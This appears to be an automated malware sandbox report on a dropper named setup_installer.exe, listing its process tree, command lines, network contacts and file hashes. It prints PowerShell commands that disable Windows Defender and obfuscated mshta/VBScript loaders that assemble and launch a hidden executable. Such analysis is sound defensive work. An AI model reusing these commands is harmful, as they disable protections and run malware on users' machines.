PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 272

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$8018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 464

Network

Country Destination Domain Proto
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 propanla.com udp
N/A 127.0.0.1:49296 tcp
N/A 127.0.0.1:49299 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
NL 194.104.136.5:46013 tcp
US 104.26.2.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 104.26.2.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2808-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8763E087\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2808-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS8763E087\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2808-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-66-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-64-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2808-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d7dc7c4758af4c44a161c8f8b6be3136
SHA1 b53863093d657af285d1f81e753fdcfb127aaa2a
SHA256 4942140f3d871f18b5a860cbaf2591bc6909ec4ae6301d50299cb3aa24865a6a
SHA512 103884eac6fb22f0acf9cd545eb4eec5972bee68b545e2b805cc97f1536bf1f2ac1e613d4e4c91927b787c8bf1e0ec67911cffce40564ad9e0c190b76d7a42e3

\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/2420-124-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
